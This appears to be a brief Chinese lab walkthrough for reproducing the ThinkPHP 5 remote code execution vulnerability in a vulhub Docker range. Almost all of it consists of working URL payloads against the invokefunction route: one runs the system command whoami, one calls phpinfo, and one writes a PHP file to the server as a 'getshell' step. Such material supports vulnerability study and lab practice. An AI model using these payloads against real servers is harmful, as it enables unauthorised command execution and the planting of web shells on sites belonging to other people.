1.环境搭建

vulhub/thinkphp/5-rce

docker-compose up -d

 2.访问靶场

远程命令执行：

? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=whoami 

远程代码执行：

 ? s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[ 1][]=-1

3.Getshell

? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=echo "<?php phpinfo();?>" >>1.php

方式二： 利用工具